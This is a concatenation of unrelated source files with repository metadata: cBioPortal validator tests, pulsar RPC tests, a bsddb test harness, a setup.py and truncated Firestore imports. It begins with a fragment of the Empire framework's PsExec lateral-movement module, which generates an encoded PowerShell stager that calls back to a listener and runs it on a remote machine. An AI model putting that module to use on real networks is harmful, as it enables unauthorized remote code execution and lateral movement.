script = moduleCode
if command != "":
# executing a custom command on the remote machine
return ""
# if
else:
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
print helpers.color("[!] Error in launcher generation.")
return ""
else:
stagerCmd = '%COMSPEC% /C start /b C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
script += "Invoke-PsExec -ComputerName %s -ServiceName \"%s\" -Command \"%s\"" % (computerName, serviceName, stagerCmd)
script += "| Out-String | %{$_ + \"`n\"};"
return script
|
thebarbershopper/Empire
|
lib/modules/lateral_movement/invoke_psexec.py
|
Python
|
bsd-3-clause
| 5,198
| 0.012697
|
#!/usr/bin/env python3
'''
Copyright (c) 2016 The Hyve B.V.
This code is licensed under the GNU Affero General Public License (AGPL),
version 3, or (at your option) any later version.
'''
import unittest
import logging
import tempfile
import os
import shutil
import time
import difflib
from importer import validateData
try:
WindowsError
except NameError:
WindowsError = None
# globals:
PORTAL_INFO_DIR = 'test_data/api_json_system_tests'
class ValidateDataSystemTester(unittest.TestCase):
'''Test cases around running the complete validateData script
(such as "does it return the correct exit status?" or "does it generate
the html report when requested?", etc)
'''
def setUp(self):
_resetClassVars()
        # Prepare global variables related to samples profiled for mutations and gene panels
self.mutation_sample_ids = None
self.mutation_file_sample_ids = set()
self.fusion_file_sample_ids = set()
def tearDown(self):
"""Close logging handlers after running validator and remove tmpdir."""
# restore original function
validateData.mutation_sample_ids = None
validateData.mutation_file_sample_ids = set()
validateData.fusion_file_sample_ids = set()
# get the logger used in validateData.main_validate()
validator_logger = logging.getLogger(validateData.__name__)
# flush and close all handlers of this logger
for logging_handler in validator_logger.handlers:
logging_handler.close()
# remove the handlers from the logger to reset it
validator_logger.handlers = []
super(ValidateDataSystemTester, self).tearDown()
def assertFileGenerated(self, tmp_file_name, expected_file_name):
"""Assert that a file has been generated with the expected contents."""
self.assertTrue(os.path.exists(tmp_file_name))
with open(tmp_file_name, 'r') as out_file, \
open(expected_file_name, 'r') as ref_file:
base_filename = os.path.basename(tmp_file_name)
diff_result = difflib.context_diff(
ref_file.readlines(),
out_file.readlines(),
fromfile='Expected {}'.format(base_filename),
tofile='Generated {}'.format(base_filename))
diff_line_list = list(diff_result)
self.assertEqual(diff_line_list, [],
msg='\n' + ''.join(diff_line_list))
# remove temp file if all is fine:
try:
os.remove(tmp_file_name)
except WindowsError:
# ignore this Windows specific error...probably happens because of virus scanners scanning the temp file...
pass
def test_exit_status_success(self):
'''study 0 : no errors, expected exit_status = 0.
If there are errors, the script should return
0: 'succeeded',
1: 'failed',
2: 'not performed as problems occurred',
3: 'succeeded with warnings'
'''
# build up the argument list
print("===study 0")
args = ['--study_directory', 'test_data/study_es_0/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v']
# execute main function with arguments provided as if from sys.argv
args = validateData.interface(args)
exit_status = validateData.main_validate(args)
self.assertEqual(0, exit_status)
def test_exit_status_failure(self):
'''study 1 : errors, expected exit_status = 1.'''
#Build up arguments and run
print("===study 1")
args = ['--study_directory', 'test_data/study_es_1/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v']
args = validateData.interface(args)
# Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
self.assertEqual(1, exit_status)
def test_exit_status_invalid(self):
'''test to fail: give wrong hugo file, or let a meta file point to a non-existing data file, expected exit_status = 2.'''
#Build up arguments and run
print("===study invalid")
args = ['--study_directory', 'test_data/study_es_invalid/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v']
args = validateData.interface(args)
# Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
self.assertEqual(2, exit_status)
def test_exit_status_warnings(self):
'''study 3 : warnings only, expected exit_status = 3.'''
# data_filename: test
#Build up arguments and run
print("===study 3")
args = ['--study_directory', 'test_data/study_es_3/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v']
args = validateData.interface(args)
# Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
self.assertEqual(3, exit_status)
def test_html_output(self):
'''
Test if html file is correctly generated when 'html_table' is given
'''
#Build up arguments and run
out_file_name = 'test_data/study_es_0/result_report.html~'
args = ['--study_directory', 'test_data/study_es_0/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v',
'--html_table', out_file_name]
args = validateData.interface(args)
# Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
self.assertEqual(0, exit_status)
self.assertFileGenerated(out_file_name,
'test_data/study_es_0/result_report.html')
def test_portal_mismatch(self):
'''Test if validation fails when data contradicts the portal.'''
# build up arguments and run
argv = ['--study_directory', 'test_data/study_portal_mismatch',
'--portal_info_dir', PORTAL_INFO_DIR, '--verbose']
parsed_args = validateData.interface(argv)
exit_status = validateData.main_validate(parsed_args)
# flush logging handlers used in validateData
validator_logger = logging.getLogger(validateData.__name__)
for logging_handler in validator_logger.handlers:
logging_handler.flush()
        # expecting a failure exit status because the study data contradicts the portal
self.assertEqual(exit_status, 1)
def test_no_portal_checks(self):
'''Test if validation skips portal-specific checks when instructed.'''
# build up arguments and run
argv = ['--study_directory', 'test_data/study_portal_mismatch',
'--verbose',
'--no_portal_checks']
parsed_args = validateData.interface(argv)
exit_status = validateData.main_validate(parsed_args)
# flush logging handlers used in validateData
validator_logger = logging.getLogger(validateData.__name__)
for logging_handler in validator_logger.handlers:
logging_handler.flush()
# expecting only warnings (about the skipped checks), no errors
self.assertEqual(exit_status, 3)
def test_problem_in_clinical(self):
'''Test whether the script aborts if the sample file cannot be parsed.
Further files cannot be validated in this case, as all sample IDs will
be undefined. Validate if the script is giving the proper error.
'''
# build the argument list
out_file_name = 'test_data/study_wr_clin/result_report.html~'
print('==test_problem_in_clinical==')
args = ['--study_directory', 'test_data/study_wr_clin/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v',
'--html_table', out_file_name]
# execute main function with arguments provided as if from sys.argv
args = validateData.interface(args)
exit_status = validateData.main_validate(args)
self.assertEqual(1, exit_status)
# TODO - set logger in main_validate and read out buffer here to assert on nr of errors
self.assertFileGenerated(out_file_name,
'test_data/study_wr_clin/result_report.html')
def test_various_issues(self):
'''Test if output is generated for a mix of errors and warnings.
        This includes HTML output, the error line file and the exit status.
'''
# build the argument list
html_file_name = 'test_data/study_various_issues/result_report.html~'
error_file_name = 'test_data/study_various_issues/error_file.txt~'
args = ['--study_directory', 'test_data/study_various_issues/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v',
'--html_table', html_file_name,
'--error_file', error_file_name]
args = validateData.interface(args)
# execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
# flush logging handlers used in validateData
validator_logger = logging.getLogger(validateData.__name__)
for logging_handler in validator_logger.handlers:
logging_handler.flush()
# should fail because of various errors in addition to warnings
self.assertEqual(1, exit_status)
# In MAF files (mutation data) there is a column called
# "Matched_Norm_Sample_Barcode". The respective metadata file supports
# giving a list of sample codes against which this column is validated.
# This and other errors are expected in these output files.
self.assertFileGenerated(
html_file_name,
'test_data/study_various_issues/result_report.html')
self.assertFileGenerated(
error_file_name,
'test_data/study_various_issues/error_file.txt')
def test_files_with_quotes(self):
'''
Tests the scenario where data files contain quotes. This should give errors.
'''
#Build up arguments and run
out_file_name = 'test_data/study_quotes/result_report.html~'
print('==test_files_with_quotes==')
args = ['--study_directory', 'test_data/study_quotes/',
'--portal_info_dir', PORTAL_INFO_DIR, '-v',
'--html_table', out_file_name]
args = validateData.interface(args)
# Execute main function with arguments provided through sys.argv
exit_status = validateData.main_validate(args)
# should fail because of errors with quotes
self.assertEqual(1, exit_status)
self.assertFileGenerated(out_file_name,
'test_data/study_quotes/result_report.html')
def _resetClassVars():
"""Reset the state of classes that check mulitple files of the same type.
GsvaWiseFileValidator classes check
consistency between multiple data files by collecting information in class variables.
This implementation is not consistent with the unit test environment that simulates
different studies to be loaded. To ensure real-world fucntionality the class variables
should be reset before each unit test that tests multi file consistency."""
for c in [ validateData.GsvaWiseFileValidator ]:
c.prior_validated_sample_ids = None
c.prior_validated_feature_ids = None
c.prior_validated_header = None
if __name__ == '__main__':
unittest.main(buffer=True)
|
mandawilson/cbioportal
|
core/src/test/scripts/system_tests_validate_data.py
|
Python
|
agpl-3.0
| 11,621
| 0.001807
|
'''Tests the RPC "calculator" example.'''
import unittest
import types
from pulsar import send
from pulsar.apps import rpc, http
from pulsar.apps.test import dont_run_with_thread
from .manage import server, Root, Calculator
class TestRpcOnThread(unittest.TestCase):
app_cfg = None
concurrency = 'thread'
# used for both keep-alive and timeout in JsonProxy
    # long enough to allow waiting for tasks
rpc_timeout = 500
@classmethod
def setUpClass(cls):
name = 'calc_' + cls.concurrency
s = server(bind='127.0.0.1:0', name=name, concurrency=cls.concurrency)
cls.app_cfg = yield from send('arbiter', 'run', s)
cls.uri = 'http://{0}:{1}'.format(*cls.app_cfg.addresses[0])
cls.p = rpc.JsonProxy(cls.uri, timeout=cls.rpc_timeout)
@classmethod
def tearDownClass(cls):
if cls.app_cfg:
return send('arbiter', 'kill_actor', cls.app_cfg.name)
def setUp(self):
self.assertEqual(self.p.url, self.uri)
self.assertTrue(str(self.p))
proxy = self.p.bla
self.assertEqual(proxy.name, 'bla')
self.assertEqual(proxy.url, self.uri)
self.assertEqual(proxy._client, self.p)
self.assertEqual(str(proxy), 'bla')
def test_wsgi_handler(self):
cfg = self.app_cfg
self.assertTrue(cfg.callable)
wsgi_handler = cfg.callable.setup({})
self.assertEqual(len(wsgi_handler.middleware), 2)
router = wsgi_handler.middleware[1]
self.assertEqual(router.route.path, '/')
root = router.post
self.assertEqual(len(root.subHandlers), 1)
hnd = root.subHandlers['calc']
self.assertFalse(hnd.isroot())
self.assertEqual(hnd.subHandlers, {})
# Pulsar server commands
def test_ping(self):
response = yield from self.p.ping()
self.assertEqual(response, 'pong')
def test_functions_list(self):
result = yield from self.p.functions_list()
self.assertTrue(result)
d = dict(result)
self.assertTrue('ping' in d)
self.assertTrue('echo' in d)
self.assertTrue('functions_list' in d)
self.assertTrue('calc.add' in d)
self.assertTrue('calc.divide' in d)
def test_time_it(self):
'''Ping server 5 times'''
bench = yield from self.p.timeit('ping', 5)
self.assertTrue(len(bench.result), 5)
self.assertTrue(bench.taken)
# Test Object method
def test_check_request(self):
result = yield from self.p.check_request('check_request')
self.assertTrue(result)
def test_add(self):
response = yield from self.p.calc.add(3, 7)
self.assertEqual(response, 10)
def test_subtract(self):
response = yield from self.p.calc.subtract(546, 46)
self.assertEqual(response, 500)
def test_multiply(self):
response = yield from self.p.calc.multiply(3, 9)
self.assertEqual(response, 27)
def test_divide(self):
response = yield from self.p.calc.divide(50, 25)
self.assertEqual(response, 2)
def test_info(self):
response = yield from self.p.server_info()
self.assertTrue('server' in response)
server = response['server']
self.assertTrue('version' in server)
app = response['monitors'][self.app_cfg.name]
if self.concurrency == 'thread':
self.assertFalse(app['workers'])
worker = app
else:
workers = app['workers']
self.assertEqual(len(workers), 1)
worker = workers[0]
name = '%sserver' % self.app_cfg.name
if name in worker:
self._check_tcpserver(worker[name]['server'])
def _check_tcpserver(self, server):
sockets = server['sockets']
if sockets:
self.assertEqual(len(sockets), 1)
sock = sockets[0]
self.assertEqual(sock['address'],
'%s:%s' % self.app_cfg.addresses[0])
def test_invalid_params(self):
return self.async.assertRaises(rpc.InvalidParams, self.p.calc.add,
50, 25, 67)
def test_invalid_params_fromApi(self):
return self.async.assertRaises(rpc.InvalidParams, self.p.calc.divide,
50, 25, 67)
def test_invalid_function(self):
p = self.p
yield from self.async.assertRaises(rpc.NoSuchFunction, p.foo, 'ciao')
yield from self.async.assertRaises(rpc.NoSuchFunction,
p.blabla)
yield from self.async.assertRaises(rpc.NoSuchFunction,
p.blabla.foofoo)
yield from self.async.assertRaises(rpc.NoSuchFunction,
p.blabla.foofoo.sjdcbjcb)
def testInternalError(self):
return self.async.assertRaises(rpc.InternalError, self.p.calc.divide,
'ciao', 'bo')
def testCouldNotserialize(self):
return self.async.assertRaises(rpc.InternalError, self.p.dodgy_method)
def testpaths(self):
        '''Fetch a sizable amount of data'''
response = yield from self.p.calc.randompaths(num_paths=20, size=100,
mu=1, sigma=2)
self.assertTrue(response)
def test_echo(self):
response = yield from self.p.echo('testing echo')
self.assertEqual(response, 'testing echo')
def test_docs(self):
handler = Root({'calc': Calculator})
self.assertEqual(handler.parent, None)
self.assertEqual(handler.root, handler)
self.assertRaises(rpc.NoSuchFunction, handler.get_handler,
'cdscsdcscd')
calc = handler.subHandlers['calc']
self.assertEqual(calc.parent, handler)
self.assertEqual(calc.root, handler)
docs = handler.docs()
self.assertTrue(docs)
response = yield from self.p.documentation()
self.assertEqual(response, docs)
def test_batch_one_call(self):
bp = rpc.JsonBatchProxy(self.uri, timeout=self.rpc_timeout)
call_id1 = bp.ping()
self.assertIsNotNone(call_id1)
self.assertEqual(len(bp), 1)
batch_generator = yield from bp
self.assertIsInstance(batch_generator, types.GeneratorType)
self.assertEqual(len(bp), 0)
for ind, batch_response in enumerate(batch_generator):
self.assertEqual(ind, 0)
self.assertEqual(call_id1, batch_response.id)
self.assertEqual(batch_response.result, 'pong')
self.assertIsNone(batch_response.exception)
def test_batch_few_call(self):
bp = rpc.JsonBatchProxy(self.uri, timeout=self.rpc_timeout)
call_id1 = bp.ping()
self.assertIsNotNone(call_id1)
self.assertEqual(len(bp), 1)
call_id2 = bp.calc.add(1, 1)
self.assertIsNotNone(call_id2)
self.assertEqual(len(bp), 2)
batch_generator = yield from bp
self.assertIsInstance(batch_generator, types.GeneratorType)
self.assertEqual(len(bp), 0)
for ind, batch_response in enumerate(batch_generator):
self.assertIn(ind, (0, 1))
if call_id1 == batch_response.id:
self.assertEqual(batch_response.result, 'pong')
self.assertIsNone(batch_response.exception)
elif call_id2 == batch_response.id:
self.assertEqual(batch_response.result, 2)
self.assertIsNone(batch_response.exception)
def test_batch_error_response_call(self):
bp = rpc.JsonBatchProxy(self.uri, timeout=self.rpc_timeout)
call_id1 = bp.ping('wrong param')
self.assertIsNotNone(call_id1)
self.assertEqual(len(bp), 1)
batch_generator = yield from bp
self.assertIsInstance(batch_generator, types.GeneratorType)
self.assertEqual(len(bp), 0)
for ind, batch_response in enumerate(batch_generator):
self.assertEqual(ind, 0)
self.assertEqual(call_id1, batch_response.id)
self.assertIsInstance(batch_response.exception, rpc.InvalidParams)
self.assertIsNone(batch_response.result)
def test_batch_full_response_call(self):
bp = rpc.JsonBatchProxy(self.uri, timeout=self.rpc_timeout,
full_response=True)
bp.ping()
bp.ping()
bp.ping()
self.assertEqual(len(bp), 3)
response = yield from bp
self.assertIsInstance(response, http.HttpResponse)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(bp), 0)
@dont_run_with_thread
class TestRpcOnProcess(TestRpcOnThread):
concurrency = 'process'
# Synchronous client
def test_sync_ping(self):
sync = rpc.JsonProxy(self.uri, sync=True)
self.assertEqual(sync.ping(), 'pong')
self.assertEqual(sync.ping(), 'pong')
|
nooperpudd/pulsar
|
examples/calculator/tests.py
|
Python
|
bsd-3-clause
| 9,018
| 0.000887
|
"""Run all test cases.
"""
import sys
import os
import unittest
try:
# For Pythons w/distutils pybsddb
import bsddb3 as bsddb
except ImportError:
# For Python 2.3
import bsddb
if sys.version_info[0] >= 3 :
charset = "iso8859-1" # Full 8 bit
class logcursor_py3k(object) :
def __init__(self, env) :
self._logcursor = env.log_cursor()
def __getattr__(self, v) :
return getattr(self._logcursor, v)
def __next__(self) :
v = getattr(self._logcursor, "next")()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
next = __next__
def first(self) :
v = self._logcursor.first()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
def last(self) :
v = self._logcursor.last()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
def prev(self) :
v = self._logcursor.prev()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
def current(self) :
v = self._logcursor.current()
if v is not None :
v = (v[0], v[1].decode(charset))
return v
def set(self, lsn) :
v = self._logcursor.set(lsn)
if v is not None :
v = (v[0], v[1].decode(charset))
return v
class cursor_py3k(object) :
def __init__(self, db, *args, **kwargs) :
self._dbcursor = db.cursor(*args, **kwargs)
def __getattr__(self, v) :
return getattr(self._dbcursor, v)
def _fix(self, v) :
if v is None : return None
key, value = v
if isinstance(key, bytes) :
key = key.decode(charset)
return (key, value.decode(charset))
def __next__(self) :
v = getattr(self._dbcursor, "next")()
return self._fix(v)
next = __next__
def previous(self) :
v = self._dbcursor.previous()
return self._fix(v)
def last(self) :
v = self._dbcursor.last()
return self._fix(v)
def set(self, k) :
if isinstance(k, str) :
k = bytes(k, charset)
v = self._dbcursor.set(k)
return self._fix(v)
def set_recno(self, num) :
v = self._dbcursor.set_recno(num)
return self._fix(v)
def set_range(self, k, dlen=-1, doff=-1) :
if isinstance(k, str) :
k = bytes(k, charset)
v = self._dbcursor.set_range(k, dlen=dlen, doff=doff)
return self._fix(v)
def dup(self, flags=0) :
cursor = self._dbcursor.dup(flags)
return dup_cursor_py3k(cursor)
def next_dup(self) :
v = self._dbcursor.next_dup()
return self._fix(v)
def next_nodup(self) :
v = self._dbcursor.next_nodup()
return self._fix(v)
def put(self, key, data, flags=0, dlen=-1, doff=-1) :
if isinstance(key, str) :
key = bytes(key, charset)
if isinstance(data, str) :
                data = bytes(data, charset)
return self._dbcursor.put(key, data, flags=flags, dlen=dlen,
doff=doff)
def current(self, flags=0, dlen=-1, doff=-1) :
v = self._dbcursor.current(flags=flags, dlen=dlen, doff=doff)
return self._fix(v)
def first(self) :
v = self._dbcursor.first()
return self._fix(v)
def pget(self, key=None, data=None, flags=0) :
# Incorrect because key can be a bare number,
# but enough to pass testsuite
if isinstance(key, int) and (data is None) and (flags == 0) :
flags = key
key = None
if isinstance(key, str) :
key = bytes(key, charset)
if isinstance(data, int) and (flags==0) :
flags = data
data = None
if isinstance(data, str) :
data = bytes(data, charset)
v=self._dbcursor.pget(key=key, data=data, flags=flags)
if v is not None :
v1, v2, v3 = v
if isinstance(v1, bytes) :
v1 = v1.decode(charset)
if isinstance(v2, bytes) :
v2 = v2.decode(charset)
v = (v1, v2, v3.decode(charset))
return v
def join_item(self) :
v = self._dbcursor.join_item()
if v is not None :
v = v.decode(charset)
return v
def get(self, *args, **kwargs) :
l = len(args)
if l == 2 :
k, f = args
if isinstance(k, str) :
k = bytes(k, "iso8859-1")
args = (k, f)
elif l == 3 :
k, d, f = args
if isinstance(k, str) :
k = bytes(k, charset)
if isinstance(d, str) :
d = bytes(d, charset)
args =(k, d, f)
v = self._dbcursor.get(*args, **kwargs)
if v is not None :
k, v = v
if isinstance(k, bytes) :
k = k.decode(charset)
v = (k, v.decode(charset))
return v
def get_both(self, key, value) :
if isinstance(key, str) :
key = bytes(key, charset)
if isinstance(value, str) :
value = bytes(value, charset)
v=self._dbcursor.get_both(key, value)
return self._fix(v)
class dup_cursor_py3k(cursor_py3k) :
def __init__(self, dbcursor) :
self._dbcursor = dbcursor
class DB_py3k(object) :
def __init__(self, *args, **kwargs) :
args2=[]
for i in args :
if isinstance(i, DBEnv_py3k) :
i = i._dbenv
args2.append(i)
args = tuple(args2)
for k, v in kwargs.items() :
if isinstance(v, DBEnv_py3k) :
kwargs[k] = v._dbenv
self._db = bsddb._db.DB_orig(*args, **kwargs)
def __contains__(self, k) :
if isinstance(k, str) :
k = bytes(k, charset)
return getattr(self._db, "has_key")(k)
def __getitem__(self, k) :
if isinstance(k, str) :
k = bytes(k, charset)
v = self._db[k]
if v is not None :
v = v.decode(charset)
return v
def __setitem__(self, k, v) :
if isinstance(k, str) :
k = bytes(k, charset)
if isinstance(v, str) :
v = bytes(v, charset)
self._db[k] = v
def __delitem__(self, k) :
if isinstance(k, str) :
k = bytes(k, charset)
del self._db[k]
def __getattr__(self, v) :
return getattr(self._db, v)
def __len__(self) :
return len(self._db)
def has_key(self, k, txn=None) :
if isinstance(k, str) :
k = bytes(k, charset)
return self._db.has_key(k, txn=txn)
def set_re_delim(self, c) :
if isinstance(c, str) : # We can use a numeric value byte too
c = bytes(c, charset)
return self._db.set_re_delim(c)
def set_re_pad(self, c) :
if isinstance(c, str) : # We can use a numeric value byte too
c = bytes(c, charset)
return self._db.set_re_pad(c)
def get_re_source(self) :
source = self._db.get_re_source()
return source.decode(charset)
def put(self, key, data, txn=None, flags=0, dlen=-1, doff=-1) :
if isinstance(key, str) :
key = bytes(key, charset)
if isinstance(data, str) :
                data = bytes(data, charset)
return self._db.put(key, data, flags=flags, txn=txn, dlen=dlen,
doff=doff)
def append(self, value, txn=None) :
if isinstance(value, str) :
value = bytes(value, charset)
return self._db.append(value, txn=txn)
def get_size(self, key) :
if isinstance(key, str) :
key = bytes(key, charset)
return self._db.get_size(key)
def exists(self, key, *args, **kwargs) :
if isinstance(key, str) :
key = bytes(key, charset)
return self._db.exists(key, *args, **kwargs)
def get(self, key, default="MagicCookie", txn=None, flags=0, dlen=-1, doff=-1) :
if isinstance(key, str) :
key = bytes(key, charset)
if default != "MagicCookie" : # Magic for 'test_get_none.py'
v=self._db.get(key, default=default, txn=txn, flags=flags,
dlen=dlen, doff=doff)
else :
v=self._db.get(key, txn=txn, flags=flags,
dlen=dlen, doff=doff)
if (v is not None) and isinstance(v, bytes) :
v = v.decode(charset)
return v
def pget(self, key, txn=None) :
if isinstance(key, str) :
key = bytes(key, charset)
v=self._db.pget(key, txn=txn)
if v is not None :
v1, v2 = v
if isinstance(v1, bytes) :
v1 = v1.decode(charset)
v = (v1, v2.decode(charset))
return v
def get_both(self, key, value, txn=None, flags=0) :
if isinstance(key, str) :
key = bytes(key, charset)
if isinstance(value, str) :
value = bytes(value, charset)
v=self._db.get_both(key, value, txn=txn, flags=flags)
if v is not None :
v = v.decode(charset)
return v
def delete(self, key, txn=None) :
if isinstance(key, str) :
key = bytes(key, charset)
return self._db.delete(key, txn=txn)
def keys(self) :
k = self._db.keys()
if len(k) and isinstance(k[0], bytes) :
return [i.decode(charset) for i in self._db.keys()]
else :
return k
def items(self) :
data = self._db.items()
if not len(data) : return data
data2 = []
for k, v in data :
if isinstance(k, bytes) :
k = k.decode(charset)
data2.append((k, v.decode(charset)))
return data2
def associate(self, secondarydb, callback, flags=0, txn=None) :
class associate_callback(object) :
def __init__(self, callback) :
self._callback = callback
def callback(self, key, data) :
if isinstance(key, str) :
key = key.decode(charset)
data = data.decode(charset)
key = self._callback(key, data)
if (key != bsddb._db.DB_DONOTINDEX) :
if isinstance(key, str) :
key = bytes(key, charset)
elif isinstance(key, list) :
key2 = []
for i in key :
if isinstance(i, str) :
i = bytes(i, charset)
key2.append(i)
key = key2
return key
return self._db.associate(secondarydb._db,
associate_callback(callback).callback, flags=flags,
txn=txn)
def cursor(self, txn=None, flags=0) :
return cursor_py3k(self._db, txn=txn, flags=flags)
def join(self, cursor_list) :
cursor_list = [i._dbcursor for i in cursor_list]
return dup_cursor_py3k(self._db.join(cursor_list))
class DBEnv_py3k(object) :
def __init__(self, *args, **kwargs) :
self._dbenv = bsddb._db.DBEnv_orig(*args, **kwargs)
def __getattr__(self, v) :
return getattr(self._dbenv, v)
def log_cursor(self, flags=0) :
return logcursor_py3k(self._dbenv)
def get_lg_dir(self) :
return self._dbenv.get_lg_dir().decode(charset)
def get_tmp_dir(self) :
return self._dbenv.get_tmp_dir().decode(charset)
def get_data_dirs(self) :
return tuple(
(i.decode(charset) for i in self._dbenv.get_data_dirs()))
class DBSequence_py3k(object) :
def __init__(self, db, *args, **kwargs) :
self._db=db
self._dbsequence = bsddb._db.DBSequence_orig(db._db, *args, **kwargs)
def __getattr__(self, v) :
return getattr(self._dbsequence, v)
def open(self, key, *args, **kwargs) :
return self._dbsequence.open(bytes(key, charset), *args, **kwargs)
def get_key(self) :
return self._dbsequence.get_key().decode(charset)
def get_dbp(self) :
return self._db
bsddb._db.DBEnv_orig = bsddb._db.DBEnv
bsddb._db.DB_orig = bsddb._db.DB
if bsddb.db.version() <= (4, 3) :
bsddb._db.DBSequence_orig = None
else :
bsddb._db.DBSequence_orig = bsddb._db.DBSequence
def do_proxy_db_py3k(flag) :
flag2 = do_proxy_db_py3k.flag
do_proxy_db_py3k.flag = flag
if flag :
bsddb.DBEnv = bsddb.db.DBEnv = bsddb._db.DBEnv = DBEnv_py3k
bsddb.DB = bsddb.db.DB = bsddb._db.DB = DB_py3k
bsddb._db.DBSequence = DBSequence_py3k
else :
bsddb.DBEnv = bsddb.db.DBEnv = bsddb._db.DBEnv = bsddb._db.DBEnv_orig
bsddb.DB = bsddb.db.DB = bsddb._db.DB = bsddb._db.DB_orig
bsddb._db.DBSequence = bsddb._db.DBSequence_orig
return flag2
do_proxy_db_py3k.flag = False
do_proxy_db_py3k(True)
try:
# For Pythons w/distutils pybsddb
from bsddb3 import db, dbtables, dbutils, dbshelve, \
hashopen, btopen, rnopen, dbobj
except ImportError:
# For Python 2.3
from bsddb import db, dbtables, dbutils, dbshelve, \
hashopen, btopen, rnopen, dbobj
try:
from bsddb3 import test_support
except ImportError:
if sys.version_info[0] < 3 :
from test import test_support
else :
from test import support as test_support
try:
if sys.version_info[0] < 3 :
from threading import Thread, currentThread
del Thread, currentThread
else :
from threading import Thread, current_thread
del Thread, current_thread
have_threads = True
except ImportError:
have_threads = False
verbose = 0
if 'verbose' in sys.argv:
verbose = 1
sys.argv.remove('verbose')
if 'silent' in sys.argv: # take care of old flag, just in case
verbose = 0
sys.argv.remove('silent')
def print_versions():
print
print '-=' * 38
print db.DB_VERSION_STRING
print 'bsddb.db.version(): %s' % (db.version(), )
if db.version() >= (5, 0) :
print 'bsddb.db.full_version(): %s' %repr(db.full_version())
print 'bsddb.db.__version__: %s' % db.__version__
print 'bsddb.db.cvsid: %s' % db.cvsid
# Workaround for allowing generating an EGGs as a ZIP files.
suffix="__"
print 'py module: %s' % getattr(bsddb, "__file"+suffix)
print 'extension module: %s' % getattr(bsddb, "__file"+suffix)
print 'python version: %s' % sys.version
print 'My pid: %s' % os.getpid()
print '-=' * 38
def get_new_path(name) :
get_new_path.mutex.acquire()
try :
import os
path=os.path.join(get_new_path.prefix,
name+"_"+str(os.getpid())+"_"+str(get_new_path.num))
get_new_path.num+=1
finally :
get_new_path.mutex.release()
return path
def get_new_environment_path() :
path=get_new_path("environment")
import os
try:
os.makedirs(path,mode=0700)
except os.error:
test_support.rmtree(path)
os.makedirs(path)
return path
def get_new_database_path() :
path=get_new_path("database")
import os
if os.path.exists(path) :
os.remove(path)
return path
# This path can be overriden via "set_test_path_prefix()".
import os, os.path
get_new_path.prefix=os.path.join(os.environ.get("TMPDIR",
os.path.join(os.sep,"tmp")), "z-Berkeley_DB")
get_new_path.num=0
def get_test_path_prefix() :
return get_new_path.prefix
def set_test_path_prefix(path) :
get_new_path.prefix=path
def remove_test_path_directory() :
test_support.rmtree(get_new_path.prefix)
if have_threads :
import threading
get_new_path.mutex=threading.Lock()
del threading
else :
class Lock(object) :
def acquire(self) :
pass
def release(self) :
pass
get_new_path.mutex=Lock()
del Lock
class PrintInfoFakeTest(unittest.TestCase):
def testPrintVersions(self):
print_versions()
# This little hack is for when this module is run as main and all the
# other modules import it so they will still be able to get the right
# verbose setting. It's confusing but it works.
if sys.version_info[0] < 3 :
import test_all
test_all.verbose = verbose
else :
import sys
print >>sys.stderr, "Work to do!"
def suite(module_prefix='', timing_check=None):
test_modules = [
'test_associate',
'test_basics',
'test_dbenv',
'test_db',
'test_compare',
'test_compat',
'test_cursor_pget_bug',
'test_dbobj',
'test_dbshelve',
'test_dbtables',
'test_distributed_transactions',
'test_early_close',
'test_fileid',
'test_get_none',
'test_join',
'test_lock',
'test_misc',
'test_pickle',
'test_queue',
'test_recno',
'test_replication',
'test_sequence',
'test_thread',
]
alltests = unittest.TestSuite()
for name in test_modules:
#module = __import__(name)
# Do it this way so that suite may be called externally via
# python's Lib/test/test_bsddb3.
module = __import__(module_prefix+name, globals(), locals(), name)
alltests.addTest(module.test_suite())
if timing_check:
alltests.addTest(unittest.makeSuite(timing_check))
return alltests
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(PrintInfoFakeTest))
return suite
if __name__ == '__main__':
print_versions()
unittest.main(defaultTest='suite')
|
Jeff-Tian/mybnb
|
Python27/Lib/bsddb/test/test_all.py
|
Python
|
apache-2.0
| 19,765
| 0.011131
|
# -*- coding: utf-8 -*-
from distutils.core import setup
import os.path
classifiers = [
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)",
"Operating System :: OS Independent",
"Topic :: Software Development :: Libraries :: Python Modules",
]
def read(fname):
fname = os.path.join(os.path.dirname(__file__), fname)
return open(fname).read().strip()
def read_files(*fnames):
return '\r\n\r\n\r\n'.join(map(read, fnames))
setup(
name = 'icall',
version = '0.3.4',
py_modules = ['icall'],
description = 'Parameters call function, :-)',
long_description = read_files('README.rst', 'CHANGES.rst'),
author = 'huyx',
author_email = 'ycyuxin@gmail.com',
url = 'https://github.com/huyx/icall',
keywords = ['functools', 'function', 'call'],
classifiers = classifiers,
)
|
huyx/icall
|
setup.py
|
Python
|
lgpl-3.0
| 1,026
| 0.024366
|
#! /usr/bin/python
import sys
import os
import json
import grpc
import time
import subprocess
from google.oauth2 import service_account
import google.oauth2.credentials
import google.auth.transport.requests
import google.auth.transport.grpc
from google.firestore.v1beta1 import firestore_pb2
from google.firestore.v1beta1 import firestore_pb2_grpc
from google.firestore.v1beta1 import document_pb2
